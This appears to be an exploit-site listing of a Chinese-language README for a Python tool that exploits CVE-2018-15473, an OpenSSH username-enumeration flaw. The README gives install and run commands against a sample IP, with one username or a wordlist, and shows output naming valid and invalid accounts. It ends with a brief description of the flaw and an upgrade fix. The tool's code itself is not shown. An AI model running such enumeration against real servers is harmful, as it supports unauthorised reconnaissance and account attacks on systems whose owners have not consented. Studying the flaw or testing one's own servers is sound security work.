Sploitus

Exploit for CVE-2018-15473

kitploit · 2026-08-25

Exploit Code

MARKDOWN73 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-0XROBIUL-CVE-2018-15473
## CVE-2018-15473

**SSH-用户名-枚举-漏洞利用(OpenSSH 2.3 < 7.7)**

原始漏洞利用的编辑版本:https://www.exploit-db.com/exploits/45233

  * 转换为 Python3
  * 添加了用户名字典选项



## 如何运行

root@kitploit:~
    
    
    #安装依赖:
    
    foo@bar:~$ pip3 install -r requirements.txt
    
    

root@kitploit:~
    
    
    #针对单个用户名:
    
    foo@bar:~$ ./Exploit.py 192.168.1.20 -u root
    
    [+] root 是一个有效用户名
    
    

root@kitploit:~
    
    
    #针对多个用户名:
    
    foo@bar:~$ ./Exploit.py 192.168.1.20 -w username.txt
    
    [+] root 是一个有效用户名
    
    [-] mysql 是一个无效用户名
    
    [-] mike 是一个无效用户名
    
    [-] foo 是一个无效用户名
    
    [-] bar 是一个无效用户名
    
    有效用户: 
    
    root
    
    

root@kitploit:~
    
    
    #更多选项:
    
    foo@bar:~$ ./Exploit.py -h
    
    

## 关于漏洞:

系统对有效和无效的认证尝试会做出不同响应。远程用户可发送特制请求以确定目标系统上的有效用户名。因此,远程用户能够确定目标系统上的有效用户名。

## 解决方案:

应将 OpenSSH 服务器升级到 7.7 或更高版本。